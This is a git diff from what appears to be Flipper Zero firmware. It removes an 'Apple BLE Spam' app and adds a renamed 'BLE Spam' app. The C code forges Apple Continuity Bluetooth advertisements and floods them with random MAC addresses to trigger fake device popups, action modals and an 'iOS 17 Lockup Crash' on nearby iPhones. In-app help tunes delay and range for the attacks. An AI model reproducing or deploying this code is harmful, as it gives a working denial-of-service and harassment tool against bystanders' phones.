0x00, state->mac, 0x1F); -} - -static void toggle_adv(State* state, Payload* payload) { - if(state->advertising) { - stop_adv(state); - if(state->resume) furi_hal_bt_start_advertising(); - state->payload = NULL; - free(state->packet); - state->packet = NULL; - state->size = 0; - } else { - state->size = continuity_get_packet_size(payload->msg.type); - state->packet = malloc(state->size); - state->payload = payload; - furi_hal_random_fill_buf(state->mac, sizeof(state->mac)); - state->resume = furi_hal_bt_is_active(); - furi_hal_bt_stop_advertising(); - start_adv(state); - } -} - -#define PAGE_MIN (-5) -#define PAGE_MAX PAYLOAD_COUNT -enum { - PageApps = PAGE_MIN, - PageDelay, - PageDistance, - PageProximityPair, - PageNearbyAction, - PageStart = 0, - PageEnd = PAYLOAD_COUNT - 1, - PageAbout = PAGE_MAX, -}; - -static void draw_callback(Canvas* canvas, void* ctx) { - State* state = ctx; - const char* back = "Back"; - const char* next = "Next"; - switch(state->index) { - case PageStart - 1: - next = "Spam"; - break; - case PageStart: - back = "Help"; - break; - case PageEnd: - next = "About"; - break; - case PageEnd + 1: - back = "Spam"; - break; - } - - canvas_set_font(canvas, FontSecondary); - canvas_draw_icon(canvas, 3, 4, &I_apple_10px); - canvas_draw_str(canvas, 14, 12, "Apple BLE Spam"); - - switch(state->index) { - case PageApps: - canvas_set_font(canvas, FontBatteryPercent); - canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); - elements_text_box( - canvas, - 4, - 16, - 120, - 48, - AlignLeft, - AlignTop, - "\e#Some Apps\e# interfere\n" - "with the attacks, stay on\n" - "homescreen for best results", - false); - break; - case PageDelay: - canvas_set_font(canvas, FontBatteryPercent); - canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); - elements_text_box( - canvas, - 4, - 16, - 120, - 48, - AlignLeft, - AlignTop, - "\e#Delay\e# is time between\n" - "attack attempts (top right),\n" - "keep 20ms for best results", - false); - break; - case PageDistance: - canvas_set_font(canvas, FontBatteryPercent); - canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); - elements_text_box( - canvas, - 4, - 16, - 120, - 48, - AlignLeft, - AlignTop, - "\e#Distance\e# is limited, attacks\n" - "work under 1 meter but a\n" - "few are marked 'long range'", - false); - break; - case PageProximityPair: - canvas_set_font(canvas, FontBatteryPercent); - canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); - elements_text_box( - canvas, - 4, - 16, - 120, - 48, - AlignLeft, - AlignTop, - "\e#Proximity Pair\e# attacks\n" - "keep spamming but work at\n" - "very close range", - false); - break; - case PageNearbyAction: - canvas_set_font(canvas, FontBatteryPercent); - canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); - elements_text_box( - canvas, - 4, - 16, - 120, - 48, - AlignLeft, - AlignTop, - "\e#Nearby Actions\e# work one\n" - "time then need to lock and\n" - "unlock the phone", - false); - break; - case PageAbout: - canvas_set_font(canvas, FontBatteryPercent); - canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "About"); - elements_text_box( - canvas, - 4, - 16, - 122, - 48, - AlignLeft, - AlignTop, - "App+Spam by \e#WillyJL\e# XFW\n" - "IDs and Crash by \e#ECTO-1A\e#\n" - "Continuity by \e#furiousMAC\e#\n" - " Version \e#1.2\e#", - false); - break; - default: { - if(state->index < 0 || state->index > PAYLOAD_COUNT - 1) break; - const Payload* payload = &payloads[state->index]; - char str[32]; - - canvas_set_font(canvas, FontBatteryPercent); - snprintf(str, sizeof(str), "%ims", delays[state->delay]); - canvas_draw_str_aligned(canvas, 116, 12, AlignRight, AlignBottom, str); - canvas_draw_icon(canvas, 119, 6, &I_SmallArrowUp_3x5); - canvas_draw_icon(canvas, 119, 10, &I_SmallArrowDown_3x5); - - canvas_set_font(canvas, FontBatteryPercent); - snprintf( - str, - sizeof(str), - "%02i/%02i: %s", - state->index + 1, - PAYLOAD_COUNT, - continuity_get_type_name(payload->msg.type)); - canvas_draw_str(canvas, 4 - (state->index < 19 ? 1 : 0), 21, str); - - canvas_set_font(canvas, FontPrimary); - canvas_draw_str(canvas, 4, 32, payload->title); - - canvas_set_font(canvas, FontSecondary); - canvas_draw_str(canvas, 4, 46, payload->text); - - elements_button_center(canvas, state->advertising ? "Stop" : "Start"); - break; - } - } - - if(state->index > PAGE_MIN) { - elements_button_left(canvas, back); - } - if(state->index < PAGE_MAX) { - elements_button_right(canvas, next); - } -} - -static void input_callback(InputEvent* input, void* ctx) { - FuriMessageQueue* input_queue = ctx; - if(input->type == InputTypeShort || input->type == InputTypeLong || - input->type == InputTypeRepeat) { - furi_message_queue_put(input_queue, input, 0); - } -} - -int32_t apple_ble_spam(void* p) { - UNUSED(p); - for(uint8_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { - if(payloads[payload_i].random) continue; - randoms[payloads[payload_i].msg.type].count++; - } - for(ContinuityType type = 0; type < ContinuityTypeCount; type++) { - if(!randoms[type].count) continue; - randoms[type].datas = malloc(sizeof(ContinuityData*) * randoms[type].count); - uint8_t random_i = 0; - for(uint8_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { - if(payloads[payload_i].random) continue; - if(payloads[payload_i].msg.type == type) { - randoms[type].datas[random_i++] = &payloads[payload_i].msg.data; - } - } - } - - State* state = malloc(sizeof(State)); - state->thread = furi_thread_alloc(); - furi_thread_set_callback(state->thread, adv_thread); - furi_thread_set_context(state->thread, state); - furi_thread_set_stack_size(state->thread, 2048); - - FuriMessageQueue* input_queue = furi_message_queue_alloc(8, sizeof(InputEvent)); - ViewPort* view_port = view_port_alloc(); - Gui* gui = furi_record_open(RECORD_GUI); - view_port_input_callback_set(view_port, input_callback, input_queue); - view_port_draw_callback_set(view_port, draw_callback, state); - gui_add_view_port(gui, view_port, GuiLayerFullscreen); - - bool running = true; - while(running) { - InputEvent input; - furi_check(furi_message_queue_get(input_queue, &input, FuriWaitForever) == FuriStatusOk); - - Payload* payload = (state->index >= 0 && state->index <= PAYLOAD_COUNT - 1) ? - &payloads[state->index] : - NULL; - bool advertising = state->advertising; - switch(input.key) { - case InputKeyOk: - if(payload) toggle_adv(state, payload); - break; - case InputKeyUp: - if(payload && state->delay < COUNT_OF(delays) - 1) { - if(advertising) stop_adv(state); - state->delay++; - if(advertising) start_adv(state); - } - break; - case InputKeyDown: - if(payload && state->delay > 0) { - if(advertising) stop_adv(state); - state->delay--; - if(advertising) start_adv(state); - } - break; - case InputKeyLeft: - if(state->index > PAGE_MIN) { - if(advertising) toggle_adv(state, payload); - state->index--; - } - break; - case InputKeyRight: - if(state->index < PAGE_MAX) { - if(advertising) toggle_adv(state, payload); - state->index++; - } - break; - case InputKeyBack: - if(advertising) toggle_adv(state, payload); - running = false; - break; - default: - continue; - } - - view_port_update(view_port); - } - - gui_remove_view_port(gui, view_port); - furi_record_close(RECORD_GUI); - view_port_free(view_port); - furi_message_queue_free(input_queue); - - furi_thread_free(state->thread); - free(state); - - for(ContinuityType type = 0; type < ContinuityTypeCount; type++) { - free(randoms[type].datas); - } - return 0; -} diff --git a/applications/external/apple_ble_spam/application.fam b/applications/external/apple_ble_spam/application.fam deleted file mode 100644 index e387256de..000000000 --- a/applications/external/apple_ble_spam/application.fam +++ /dev/null @@ -1,20 +0,0 @@ -App( - appid="apple_ble_spam", - name="Apple BLE Spam", - apptype=FlipperAppType.EXTERNAL, - entry_point="apple_ble_spam", - stack_size=2 * 1024, - fap_icon="icons/apple_10px.png", - fap_category="Bluetooth", - fap_author="@Willy-JL & @ECTO-1A", - fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/apple_ble_spam", - fap_version="1.2", - fap_description="Spam Apple devices with annoying popups and notifications via BLE packets", - fap_icon_assets="icons", - fap_icon_assets_symbol="apple_ble_spam", - fap_private_libs=[ - Lib( - name="continuity", - ), - ], -) diff --git a/applications/external/apple_ble_spam/icons/apple_10px.png b/applications/external/apple_ble_spam/icons/apple_10px.png deleted file mode 100644 index 5bcf5eeb292eabedc9da8f62b6a13712f64cd37f..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 563 zcmV-30?hr1P)EX>4Tx04R}tkv&MmKpe$iTT4}19PA+CkfAz=1yK=4twIqhgj%6h2a`*`ph-iL z;^HW{799LotU9+0Yt2!bCVt}afBE>hzEl0u6Z503ls?%w0>9pG10C4=2nH!D|!$>1VM~S%+%*ZF$K@@bq^n3@8Uem``n)+qU22m_ypovrW+RV2J!T! zrE}gVjmKj!?(FT~Gp+u903~#Ch;5ghrvLx|32;bRa{vGi!~g&e!~vBn4jTXf00(qQ zO+^Ri2?Gub05Mv)!~g&QK}keGR2b8JjzJCpAPmA_@&8}02hFmmlM`79%z%n)*Gqhu zq>(@pkY@8Eo&tdA*kk+dd*C(S;+lxsb{lt}FHP|;Df<#m%25CS002ovPDHLkV1f-~ B^@{)i diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c deleted file mode 100644 index 3e3616fb4..000000000 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ /dev/null @@ -1,165 +0,0 @@ -#include "continuity.h" -#include -#include - -// Hacked together by @Willy-JL -// Custom adv logic by @Willy-JL (idea by @xMasterX) -// iOS 17 Crash by @ECTO-1A -// Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A -// Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ -// Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ -// Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam - -static const char* continuity_type_names[ContinuityTypeCount] = { - [ContinuityTypeAirDrop] = "AirDrop", - [ContinuityTypeProximityPair] = "Proximity Pair", - [ContinuityTypeAirplayTarget] = "Airplay Target", - [ContinuityTypeHandoff] = "Handoff", - [ContinuityTypeTetheringSource] = "Tethering Source", - [ContinuityTypeNearbyAction] = "Nearby Action", - [ContinuityTypeNearbyInfo] = "Nearby Info", - [ContinuityTypeCustomCrash] = "Custom Packet", -}; -const char* continuity_get_type_name(ContinuityType type) { - return continuity_type_names[type]; -} - -#define HEADER_LEN (6) // 1 Length + 1 ? + 2 Company ID + 1 Continuity Type + 1 Continuity Length -static uint8_t continuity_packet_sizes[ContinuityTypeCount] = { - [ContinuityTypeAirDrop] = HEADER_LEN + 18, - [ContinuityTypeProximityPair] = HEADER_LEN + 25, - [ContinuityTypeAirplayTarget] = HEADER_LEN + 6, - [ContinuityTypeHandoff] = HEADER_LEN + 14, - [ContinuityTypeTetheringSource] = HEADER_LEN + 6, - [ContinuityTypeNearbyAction] = HEADER_LEN + 5, - [ContinuityTypeNearbyInfo] = HEADER_LEN + 5, - [ContinuityTypeCustomCrash] = HEADER_LEN + 11, -}; -uint8_t continuity_get_packet_size(ContinuityType type) { - return continuity_packet_sizes[type]; -} - -void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { - uint8_t size = continuity_get_packet_size(msg->type); - uint8_t i = 0; - - packet[i++] = size - 1; // Packet Length - packet[i++] = 0xFF; // Packet Type (Manufacturer Specific) - packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.) - packet[i++] = 0x00; // ... - packet[i++] = msg->type; // Continuity Type - packet[i] = size - i - 1; // Continuity Length - i++; - - switch(msg->type) { - case ContinuityTypeAirDrop: - packet[i++] = 0x00; // Zeros - packet[i++] = 0x00; // ... - packet[i++] = 0x00; // ... - packet[i++] = 0x00; // ... - packet[i++] = 0x00; // ... - packet[i++] = 0x00; // ... - packet[i++] = 0x00; // ... - packet[i++] = 0x00; // ... - packet[i++] = 0x01; // Version - packet[i++] = (rand() % 256); // AppleID - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // Phone Number - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // Email - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // Email2 - packet[i++] = (rand() % 256); // ... - packet[i++] = 0x00; // Zero - break; - - case ContinuityTypeProximityPair: - packet[i++] = msg->data.proximity_pair.prefix; // Prefix (paired 0x01 new 0x07 airtag 0x05) - packet[i++] = msg->data.proximity_pair.model >> 8; - packet[i++] = msg->data.proximity_pair.model & 0xFF; - packet[i++] = 0x55; // Status - packet[i++] = ((rand() % 10) << 4) + (rand() % 10); // Buds Battery Level - packet[i++] = ((rand() % 8) << 4) + (rand() % 10); // Charing Status and Battery Case Level - packet[i++] = (rand() % 256); // Lid Open Counter - packet[i++] = 0x00; // Device Color - packet[i++] = 0x00; - furi_hal_random_fill_buf(&packet[i], 16); // Encrypted Payload - i += 16; - break; - - case ContinuityTypeAirplayTarget: - packet[i++] = (rand() % 256); // Flags - packet[i++] = (rand() % 256); // Configuration Seed - packet[i++] = (rand() % 256); // IPv4 Address - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - break; - - case ContinuityTypeHandoff: - packet[i++] = 0x01; // Version - packet[i++] = (rand() % 256); // Initialization Vector - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // AES-GCM Auth Tag - packet[i++] = (rand() % 256); // Encrypted Payload - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - break; - - case ContinuityTypeTetheringSource: - packet[i++] = 0x01; // Version - packet[i++] = (rand() % 256); // Flags - packet[i++] = (rand() % 101); // Battery Life - packet[i++] = 0x00; // Cell Service Type - packet[i++] = (rand() % 8); // ... - packet[i++] = (rand() % 5); // Cell Service Strength - break; - - case ContinuityTypeNearbyAction: - packet[i] = msg->data.nearby_action.flags; // Action Flags - if(packet[i] == 0xBF && rand() % 2) packet[i]++; // Ugly hack to shift 0xBF-0xC0 for spam - i++; - packet[i++] = msg->data.nearby_action.type; - furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag - i += 3; - break; - - case ContinuityTypeNearbyInfo: - packet[i++] = ((rand() % 16) << 4) + (rand() % 16); // Status Flags and Action Code - packet[i++] = (rand() % 256); // Status Flags - packet[i++] = (rand() % 256); // Authentication Tag - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - break; - - case ContinuityTypeCustomCrash: - // Found by @ECTO-1A - - i -= 2; // Override segment header - packet[i++] = ContinuityTypeNearbyAction; // Type - packet[i++] = 0x05; // Length - packet[i++] = 0xC1; // Action Flags - const uint8_t types[] = {0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0}; - packet[i++] = types[rand() % COUNT_OF(types)]; // Action Type - furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag - i += 3; - - packet[i++] = 0x00; // ??? - packet[i++] = 0x00; // ??? - - packet[i++] = ContinuityTypeNearbyInfo; // Type ??? - furi_hal_random_fill_buf(&packet[i], 3); // Shenanigans (Length + IDK) ??? - i += 3; - break; - - default: - break; - } -} diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.h b/applications/external/apple_ble_spam/lib/continuity/continuity.h deleted file mode 100644 index d582df761..000000000 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.h +++ /dev/null @@ -1,59 +0,0 @@ -#pragma once - -#include -#include - -// Hacked together by @Willy-JL -// Custom adv logic by @Willy-JL (idea by @xMasterX) -// iOS 17 Crash by @ECTO-1A -// Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A -// Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ -// Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ -// Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam - -typedef enum { - ContinuityTypeAirDrop = 0x05, - ContinuityTypeProximityPair = 0x07, - ContinuityTypeAirplayTarget = 0x09, - ContinuityTypeHandoff = 0x0C, - ContinuityTypeTetheringSource = 0x0E, - ContinuityTypeNearbyAction = 0x0F, - ContinuityTypeNearbyInfo = 0x10, - - ContinuityTypeCustomCrash, - ContinuityTypeCount -} ContinuityType; - -typedef union { - struct { - } airdrop; - struct { - uint8_t prefix; - uint16_t model; - } proximity_pair; - struct { - } airplay_target; - struct { - } handoff; - struct { - } tethering_source; - struct { - uint8_t flags; - uint8_t type; - } nearby_action; - struct { - } nearby_info; - struct { - } custom_crash; -} ContinuityData; - -typedef struct { - ContinuityType type; - ContinuityData data; -} ContinuityMsg; - -const char* continuity_get_type_name(ContinuityType type); - -uint8_t continuity_get_packet_size(ContinuityType type); - -void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet); diff --git a/applications/external/apple_ble_spam/LICENSE b/applications/external/ble_spam/LICENSE similarity index 100% rename from applications/external/apple_ble_spam/LICENSE rename to applications/external/ble_spam/LICENSE diff --git a/applications/external/ble_spam/application.fam b/applications/external/ble_spam/application.fam new file mode 100644 index 000000000..1f0c019f1 --- /dev/null +++ b/applications/external/ble_spam/application.fam @@ -0,0 +1,15 @@ +App( + appid="ble_spam", + name="BLE Spam", + apptype=FlipperAppType.EXTERNAL, + entry_point="ble_spam", + stack_size=4 * 1024, + fap_icon="ble_spam_10px.png", + fap_category="Bluetooth", + fap_author="@Willy-JL & @ECTO-1A", + fap_weburl="https://github.com/Flipper-XFW/Xtreme-Apps/tree/dev/ble_spam", + fap_version="2.0", + fap_description="Flood BLE advertisements to cause spammy and annoying popups/notifications", + fap_icon_assets="icons", + fap_icon_assets_symbol="ble_spam", +) diff --git a/applications/external/ble_spam/ble_spam.c b/applications/external/ble_spam/ble_spam.c new file mode 100644 index 000000000..9a440471d --- /dev/null +++ b/applications/external/ble_spam/ble_spam.c @@ -0,0 +1,363 @@ +#include +#include +#include + +#include "protocols/_registry.h" + +// Hacked together by @Willy-JL +// Custom adv API by @Willy-JL (idea by @xMasterX) +// iOS 17 Crash by @ECTO-1A +// Research on behaviors and parameters by @Willy-JL and @ECTO-1A +// Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam + +typedef struct { + bool random_mac; + const BleSpamProtocol* protocol; + BleSpamMsg msg; +} Payload; + +typedef struct { + const char* title; + const char* text; + Payload payload; +} Attack; + +static Attack attacks[] = { + { + .title = "+ Kitchen Sink", + .text = "Flood all attacks at once", + .payload = + { + .random_mac = true, + .protocol = NULL, + .msg = {}, + }, + }, + { + .title = "iOS 17 Lockup Crash", + .text = "Newer iPhones, long range", + .payload = + { + .random_mac = false, + .protocol = &ble_spam_protocol_continuity, + .msg = + { + .continuity = + { + .type = ContinuityTypeCustomCrash, + .data = {}, + }, + }, + }, + }, + { + .title = "Apple Action Modal", + .text = "Lock cooldown, long range", + .payload = + { + .random_mac = false, + .protocol = &ble_spam_protocol_continuity, + .msg = + { + .continuity = + { + .type = ContinuityTypeNearbyAction, + .data = {}, + }, + }, + }, + }, + { + .title = "Apple Device Popup", + .text = "No cooldown, close range", + .payload = + { + .random_mac = false, + .protocol = &ble_spam_protocol_continuity, + .msg = + { + .continuity = + { + .type = ContinuityTypeProximityPair, + .data = {}, + }, + }, + }, + }, +}; + +#define ATTACK_COUNT ((signed)COUNT_OF(attacks)) + +uint16_t delays[] = {20, 50, 100, 200}; + +typedef struct { + bool resume; + bool advertising; + uint8_t delay; + FuriThread* thread; + int8_t index; +} State; + +static int32_t adv_thread(void* ctx) { + State* state = ctx; + uint8_t size; + uint16_t delay; + uint8_t* packet; + uint8_t mac[GAP_MAC_ADDR_SIZE]; + Payload* payload = &attacks[state->index].payload; + if(!payload->random_mac) furi_hal_random_fill_buf(mac, sizeof(mac)); + + while(state->advertising) { + if(payload->protocol) { + payload->protocol->make_packet(&size, &packet, &payload->msg); + } else { + ble_spam_protocols[rand() % ble_spam_protocols_count]->make_packet( + &size, &packet, NULL); + } + furi_hal_bt_custom_adv_set(packet, size); + free(packet); + + if(payload->random_mac) furi_hal_random_fill_buf(mac, sizeof(mac)); + delay = delays[state->delay]; + furi_hal_bt_custom_adv_start(delay, delay, 0x00, mac, 0x1F); + furi_thread_flags_wait(true, FuriFlagWaitAny, delay); + furi_hal_bt_custom_adv_stop(); + } + + return 0; +} + +static void toggle_adv(State* state) { + if(state->advertising) { + state->advertising = false; + furi_thread_flags_set(furi_thread_get_id(state->thread), true); + furi_thread_join(state->thread); + if(state->resume) furi_hal_bt_start_advertising(); + } else { + state->resume = furi_hal_bt_is_active(); + furi_hal_bt_stop_advertising(); + state->advertising = true; + furi_thread_start(state->thread); + } +} + +#define PAGE_MIN (-3) +#define PAGE_MAX ATTACK_COUNT +enum { + PageHelpApps = PAGE_MIN, + PageHelpDelay, + PageHelpDistance, + PageStart = 0, + PageEnd = ATTACK_COUNT - 1, + PageAboutCredits = PAGE_MAX, +}; + +static void draw_callback(Canvas* canvas, void* ctx) { + State* state = ctx; + const char* back = "Back"; + const char* next = "Next"; + switch(state->index) { + case PageStart - 1: + next = "Spam"; + break; + case PageStart: + back = "Help"; + break; + case PageEnd: + next = "About"; + break; + case PageEnd + 1: + back = "Spam"; + break; + } + + const Attack* attack = + (state->index >= 0 && state->index <= ATTACK_COUNT - 1) ? &attacks[state->index] : NULL; + const Payload* payload = &attack->payload; + const BleSpamProtocol* protocol = (attack && payload->protocol) ? payload->protocol : NULL; + + canvas_set_font(canvas, FontSecondary); + canvas_draw_icon(canvas, 4, 3, protocol ? protocol->icon : &I_ble); + canvas_draw_str(canvas, 14, 12, "BLE Spam"); + + switch(state->index) { + case PageHelpApps: + canvas_set_font(canvas, FontBatteryPercent); + canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); + elements_text_box( + canvas, + 4, + 16, + 120, + 48, + AlignLeft, + AlignTop, + "\e#Some Apps\e# interfere\n" + "with the attacks, stay on\n" + "homescreen for best results", + false); + break; + case PageHelpDelay: + canvas_set_font(canvas, FontBatteryPercent); + canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); + elements_text_box( + canvas, + 4, + 16, + 120, + 48, + AlignLeft, + AlignTop, + "\e#Delay\e# is time between\n" + "attack attempts (top right),\n" + "keep 20ms for best results", + false); + break; + case PageHelpDistance: + canvas_set_font(canvas, FontBatteryPercent); + canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Help"); + elements_text_box( + canvas, + 4, + 16, + 120, + 48, + AlignLeft, + AlignTop, + "\e#Distance\e# is limited, attacks\n" + "work under 1 meter but a\n" + "few are marked 'long range'", + false); + break; + case PageAboutCredits: + canvas_set_font(canvas, FontBatteryPercent); + canvas_draw_str_aligned(canvas, 124, 12, AlignRight, AlignBottom, "Credits"); + elements_text_box( + canvas, + 4, + 16, + 122, + 48, + AlignLeft, + AlignTop, + "App+Spam: \e#WillyJL\e# XFW\n" + "Apple+Crash: \e#ECTO-1A\e#\n" + "\n" + " Version \e#2.0\e#", + false); + break; + default: { + if(!attack) break; + char str[32]; + + canvas_set_font(canvas, FontBatteryPercent); + snprintf(str, sizeof(str), "%ims", delays[state->delay]); + canvas_draw_str_aligned(canvas, 116, 12, AlignRight, AlignBottom, str); + canvas_draw_icon(canvas, 119, 6, &I_SmallArrowUp_3x5); + canvas_draw_icon(canvas, 119, 10, &I_SmallArrowDown_3x5); + + canvas_set_font(canvas, FontBatteryPercent); + snprintf( + str, + sizeof(str), + "%02i/%02i: %s", + state->index + 1, + ATTACK_COUNT, + protocol ? protocol->get_name(&payload->msg) : "Everything"); + canvas_draw_str(canvas, 4 - (state->index < 19 ? 1 : 0), 21, str); + + canvas_set_font(canvas, FontPrimary); + canvas_draw_str(canvas, 4, 32, attack->title); + + canvas_set_font(canvas, FontSecondary); + canvas_draw_str(canvas, 4, 46, attack->text); + + elements_button_center(canvas, state->advertising ? "Stop" : "Start"); + break; + } + } + + if(state->index > PAGE_MIN) { + elements_button_left(canvas, back); + } + if(state->index < PAGE_MAX) { + elements_button_right(canvas, next); + } +} + +static void input_callback(InputEvent* input, void* ctx) { + FuriMessageQueue* input_queue = ctx; + if(input->type == InputTypeShort || input->type == InputTypeLong || + input->type == InputTypeRepeat) { + furi_message_queue_put(input_queue, input, 0); + } +} + +int32_t ble_spam(void* p) { + UNUSED(p); + State* state = malloc(sizeof(State)); + state->thread = furi_thread_alloc(); + furi_thread_set_callback(state->thread, adv_thread); + furi_thread_set_context(state->thread, state); + furi_thread_set_stack_size(state->thread, 4096); + + FuriMessageQueue* input_queue = furi_message_queue_alloc(8, sizeof(InputEvent)); + ViewPort* view_port = view_port_alloc(); + Gui* gui = furi_record_open(RECORD_GUI); + view_port_input_callback_set(view_port, input_callback, input_queue); + view_port_draw_callback_set(view_port, draw_callback, state); + gui_add_view_port(gui, view_port, GuiLayerFullscreen); + + bool running = true; + while(running) { + InputEvent input; + furi_check(furi_message_queue_get(input_queue, &input, FuriWaitForever) == FuriStatusOk); + + bool is_attack = state->index >= 0 && state->index <= ATTACK_COUNT - 1; + bool advertising = state->advertising; + switch(input.key) { + case InputKeyOk: + if(is_attack) toggle_adv(state); + break; + case InputKeyUp: + if(is_attack && state->delay < COUNT_OF(delays) - 1) { + state->delay++; + } + break; + case InputKeyDown: + if(is_attack && state->delay > 0) { + state->delay--; + } + break; + case InputKeyLeft: + if(state->index > PAGE_MIN) { + if(advertising) toggle_adv(state); + state->index--; + } + break; + case InputKeyRight: + if(state->index < PAGE_MAX) { + if(advertising) toggle_adv(state); + state->index++; + } + break; + case InputKeyBack: + if(advertising) toggle_adv(state); + running = false; + break; + default: + continue; + } + + view_port_update(view_port); + } + + gui_remove_view_port(gui, view_port); + furi_record_close(RECORD_GUI); + view_port_free(view_port); + furi_message_queue_free(input_queue); + + furi_thread_free(state->thread); + free(state); + return 0; +} diff --git a/applications/external/ble_spam/ble_spam_10px.png b/applications/external/ble_spam/ble_spam_10px.png new file mode 100644 index 0000000000000000000000000000000000000000..a204d1de5100f41acd15c5334f969988866a7828 GIT binary patch literal 4238 zcmeHKdu&rx7{7%LMqvx$P(*}ML>PE`?`>}%yR3|D9b0i7WgBc`Lw0)aX?J0Lti4-1 zP((lll$W49oFWNgVuVP95D~{~%OE1oFwm$mV~C0nFfjrl!2IrQ_fitGME+Zwv-90^ ze&=_-^ZUN@t#^$xKPOQ=T1^l{qCMAE0KIIhRRiJgp}Pz2L)U^!>~6b#3Xu?}2Raf+oHe z-Kzm?`IDf0bHS3CJNq2F!>Q5h7+PmwVLh!ka16~c1`TcEjHw)B0<`M=ZjWT9Em=dK z0hX0wR+iJAm8A&;{cf=e6GWu`#ZA`SlQYINEiBAVA(Lu{SD$je`|RykEQ?02b&hXU z@8!0Y--&mOelz*;oZ|=E+L~SGk2jST4=&CaewV1OsVD{oz7t!2+5?()#m4Rg0t=gfFh z`+?tgm*k#XcA`1`w>uMqDL+qHxrtZJt=zaE{r0%K*Dp-T%a7PE#w(;^%Yc(H^u5pR_*#6_%Hg_i?c9;UP!1tKlBYD*xE zviw1;VRfvICbJ`AtzJ7_tw{?CZmz&KGe!YVR&Avu1vrWdhr_zCLFW&8C?+*Em7?{O zUQYso4AuE06d`?~2{J{L!-hkAPz*?--=~o|k;`8rS+!c2*L3>l4LBTK^uAC`1<-?v zpa8|_Xv*uQdaejb*|k6tbLfF9LPd1}Ocmgezb44z>{{%TCiJ9`FHjeQd?b(P4Jd~K z@p^40@Ljk-O|VMA2t0+Wuop-};2+ZqFNyAMv3mI?&nU;~=?HAs#or6vd3FU1D2Icy z`S}`oQ@hQomHp)eKQ9WLV!AM58QP#HS)-XDS&M-s5$iIN*ksb1^)9mo>y16A?7onM zd_0z^fLtd64^PuPvOpkNJ!VOkWig2u+C*9`X2h~IgDoc1gJO12gsenWJ-w2t1fVkO zEpEZ>Mx={n1d?^J2GZh2JPB?wW&>|@BbQ5|lH ziF8jCiC$bNAz3uWlxk+oCbQ9GFz%&AmJWk%q+nZSr3aYQfjU@GAA zC=+s6I5-Rli{v~7W@Q}C!es?9lKjCUzrV_=?JBxm(+;>!0+NsoNf>tPD#JycWq2yh zaCG!sGM&ROi0-=oLd%y&lLmMQd9E0O{p*yW=#47G)zPQuW0j~}C5=Y86ddBCM+l)> zEGT{gS9FT6L_QCO>JdxV&T;VpsbCUP&8!ha>;;pVWNA5c0zz^=&{)r76Yne^8pqN(57Sqr;V04i5-MGBn8;{wWw0J1`~JjLs9MQUB5;O#$>M zGO#W>2E_|%A=On3W17ij=OKP#v3Q6(0CoQ+ebTpIu70`tq(Gm*{n^zoSDzH<6SzOS z{x`YQ-LF&F2fu>C@Uqn0+SmdwT7#T h9yV-#MO?C{f*{J0;x3Ng=y?L5ggraowlA|{#ox_gndtxk literal 0 HcmV?d00001 diff --git a/applications/external/ble_spam/icons/apple.png b/applications/external/ble_spam/icons/apple.png new file mode 100644 index 0000000000000000000000000000000000000000..802cf550597196c11571c86215db79bccd5b36ea GIT binary patch literal 4258 zcmeHKd2AGA6rU}$z-lXE5dx$v0|Z)}onw#g4qZy=mUgjQmQrYIt1!p6?Z950op!en z3*k^fP7yh*0trWACH1X7^s2U}Xs@Rv_CmzVY{%^COvtEsIiR@M)Cwkh?k)6vk+Ya{pg*k`yzre@r}RzWhi=+}&bf;9M{nFt(;dCmT>r_lue0-= z-&efc|AW(Co}>J&$*pbft1XA8k3eI~$4(lTW@%e;dTnKCR>O@-rMzX!4AX|s$E_Lk zVROoCcJs!<)zOu<-SgO+FO{#Ib-tqU;I!2T?|wUH==s|dzN_40UpD6T{e1`Esh2!c 